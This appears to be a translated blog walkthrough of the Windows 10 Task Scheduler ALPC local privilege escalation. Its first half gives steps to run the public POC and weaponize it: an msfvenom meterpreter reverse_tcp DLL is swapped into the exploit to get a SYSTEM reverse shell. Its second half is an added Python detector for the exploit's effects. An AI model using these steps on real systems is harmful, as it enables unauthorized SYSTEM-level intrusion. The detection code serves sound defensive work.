The function exported by the Task Scheduler service in Windows 10 does not verify the caller's permissions. A user with any privilege level can call it to obtain write permissions on sensitive system files and thereby escalate privileges.

Scope of impact: Windows 10, Windows Server 2016. Yesterday the friends in the group reproduced it successfully; some also tried it on Windows 8 and found they could escalate privileges there too.
Preparation: download the POC, a Windows 10 image, Process Explorer, and CFF Explorer
POC: GitHub - SandboxEscaper/randomrepo: Repo for random stuff
Windows 10 ISO: msdn Download
Process Explorer: Process Explorer - Windows Sysinternals | Microsoft Docs
CFF: Explorer Suite - NTCore
First, open Notepad.
Nothing looks different yet; now run the POC.
A cmd.exe running as SYSTEM, with child processes conhost.exe and notepad.exe, has been spawned!
In kali execute msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll
Move it to Windows 10.
Open ALPC-TaskSched-LPE.dll in CFF Explorer, substitute the DLL generated by msfvenom, and save.
Start the listener in Kali.
Run it on Windows 10.
Back in Kali, a meterpreter session has connected back, and it has SYSTEM privileges.
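From a defender's side, the two observable effects of the chain above are a non-privileged account newly gaining write access to a file under a protected system directory, and an ordinary user application (cmd.exe, notepad.exe) ending up running as SYSTEM. The following is an added example, not code from the original write-up or from the POC author, showing how both could be flagged from audit telemetry. The records are constructed for illustration: the permission-change records follow the general shape of Windows Security event 4670 ("Permissions on an object were changed", with old and new security descriptors in SDDL), the process records follow a generic process-creation event, and every path, account name and SID in them is made up. The check is by effect (which trustee newly gets write-class rights) rather than by who made the change, since a service acting on a user's behalf would appear as the subject.

```python
"""Added example (not part of the original post): flag DACL changes that grant
write-class rights on protected system files, and user applications that start
as SYSTEM. All sample records below are constructed, not real logs."""
import re
from dataclasses import dataclass

# Directories whose files should only ever be writable by trusted trustees.
PROTECTED_PREFIXES = (r"c:\windows\system32", r"c:\windows\syswow64")
# SDDL aliases / SIDs expected to hold write access to system files.
PRIVILEGED_TRUSTEES = {"SY", "BA", "S-1-5-18", "S-1-5-32-544"}
# Two-letter SDDL right codes that confer write, DACL or ownership control.
WRITE_CODES = {"GA", "GW", "FA", "FW", "WD", "WO"}
# GENERIC_ALL | GENERIC_WRITE | FILE_WRITE_DATA | WRITE_DAC | WRITE_OWNER
WRITE_MASK = 0x10000000 | 0x40000000 | 0x2 | 0x40000 | 0x80000
# User applications that should not normally run as SYSTEM (as seen in the post).
USER_APPS = {"notepad.exe", "cmd.exe"}
SYSTEM_ACCOUNT = "NT AUTHORITY\\SYSTEM"

_ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass
class PermissionChange:      # constructed shape of event 4670
    subject: str             # account under which the change was made
    object_name: str         # file whose DACL changed
    old_sd: str              # SDDL before the change
    new_sd: str              # SDDL after the change


@dataclass
class ProcessCreate:         # constructed shape of a process-creation event
    image: str
    user: str
    parent_image: str


def grants_write(rights: str) -> bool:
    """True if an SDDL rights field (hex mask or two-letter codes) includes write-class rights."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & WRITE_MASK)
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return bool(codes & WRITE_CODES)


def _write_trustees(sd: str) -> set:
    """Trustees holding an access-allowed ACE with write-class rights in an SDDL string."""
    out = set()
    for ace in _ACE_RE.findall(sd):
        parts = ace.split(";")          # type;flags;rights;object_guid;inherit_guid;sid
        if len(parts) != 6:
            continue
        ace_type, _, rights, _, _, sid = parts
        if ace_type == "A" and grants_write(rights):
            out.add(sid)
    return out


def new_write_grants(old_sd: str, new_sd: str) -> set:
    """Non-privileged trustees that gained write-class rights in the new descriptor."""
    return _write_trustees(new_sd) - _write_trustees(old_sd) - PRIVILEGED_TRUSTEES


def flag_permission_changes(events):
    """Return (subject, path, [new trustees]) for write grants on protected files."""
    alerts = []
    for e in events:
        if not e.object_name.lower().startswith(PROTECTED_PREFIXES):
            continue
        granted = new_write_grants(e.old_sd, e.new_sd)
        if granted:
            alerts.append((e.subject, e.object_name, sorted(granted)))
    return alerts


def flag_system_user_apps(events):
    """Return (image, parent) for user applications that were started as SYSTEM."""
    return [(e.image, e.parent_image) for e in events
            if e.user == SYSTEM_ACCOUNT
            and e.image.rsplit("\\", 1)[-1].lower() in USER_APPS]


# Constructed sample records (paths, accounts and SIDs are invented).
SAMPLE_PERMISSION_EVENTS = [
    PermissionChange("NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\constructed-target.dll",
                     "D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)",
                     "D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)"
                     "(A;;FA;;;S-1-5-21-1111-2222-3333-1001)"),   # standard user gains full control
    PermissionChange("NT SERVICE\\TrustedInstaller", r"C:\Windows\System32\other.dll",
                     "D:(A;;FA;;;SY)", "D:(A;;FA;;;SY)(A;;FA;;;BA)"),  # admins only: expected
    PermissionChange("CORP\\alice", r"C:\Users\alice\notes.txt",
                     "D:(A;;FA;;;S-1-5-21-1111-2222-3333-1001)",
                     "D:(A;;FA;;;S-1-5-21-1111-2222-3333-1001)(A;;GW;;;WD)"),  # not a protected path
]
SAMPLE_PROCESS_EVENTS = [
    ProcessCreate(r"C:\Windows\System32\notepad.exe", "CORP\\alice", r"C:\Windows\explorer.exe"),
    ProcessCreate(r"C:\Windows\System32\cmd.exe", SYSTEM_ACCOUNT, r"C:\Windows\System32\svchost.exe"),
    ProcessCreate(r"C:\Windows\System32\notepad.exe", SYSTEM_ACCOUNT, r"C:\Windows\System32\cmd.exe"),
    ProcessCreate(r"C:\Windows\System32\conhost.exe", SYSTEM_ACCOUNT, r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for alert in flag_permission_changes(SAMPLE_PERMISSION_EVENTS):
        print("write grant on protected file:", alert)
    for alert in flag_system_user_apps(SAMPLE_PROCESS_EVENTS):
        print("user app running as SYSTEM:", alert)
```

Event 4670 only appears when object-access auditing ("Audit File System") and a SACL on the relevant directories are enabled, so the first check depends on that audit policy being in place. The second check needs baselining: cmd.exe as SYSTEM is routine on hosts where administrators run service-context shells, whereas notepad.exe as SYSTEM is rarely legitimate.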